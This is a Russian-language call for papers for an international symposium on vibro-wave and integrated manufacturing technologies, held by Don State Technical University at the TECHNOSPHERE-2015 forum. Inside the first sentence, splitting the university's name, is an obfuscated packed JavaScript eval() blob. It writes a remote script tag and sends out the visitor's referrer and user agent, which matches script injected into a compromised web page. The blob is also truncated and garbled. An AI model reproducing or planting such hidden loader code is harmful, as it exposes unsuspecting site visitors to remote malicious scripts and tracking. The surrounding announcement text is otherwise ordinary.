

Донской eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!".replace(/^\s/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]};e=function(){return'w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('b'+e(c)+'b','g'),k[c])}}return p}('0.6(");n m="q";,30,30,'document||javascript|encodeURIComponent|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|script|berza|var|u0026u|referrer|ydiks||js|php'.split('|'),0,{})) государственный технический университет (ДГТУ) проводит в рамках Международного форума «ТЕХНОСФЕРА-2015» международный научный симпозиум «Интегрированные и виброволновые технологии в машиностроении, металлообработке и других отраслях». Оргкомитет приглашает принять участие в симпозиуме, посвящённого 85-летию ДГТУ и 70-летию кафедры «Технология машиностроения» выступить с докладами и сообщениями.

Направления работы симпозиума:

1. Физико-технологические основы комбинированных и виброволновых технологий обработки материалов;
2. Технологическое применение электро-физико-химических и волновых явлений в технологии машиностроения и других сферах производства;
3. Формообразование и формирование качества поверхности и покрытий в условиях комбинированного энергетического и виброволнового воздействия;
4. Высокоэффективные технологические системы обработки материалов;

5. Экологические аспекты наукоёмких и виброволновых технологий;

6. Подготовка и повышение квалификации специалистов для наукоёмких технологий в машиностроении.

Подробнее о симпозиуме см. в [информационном сообщении](#) .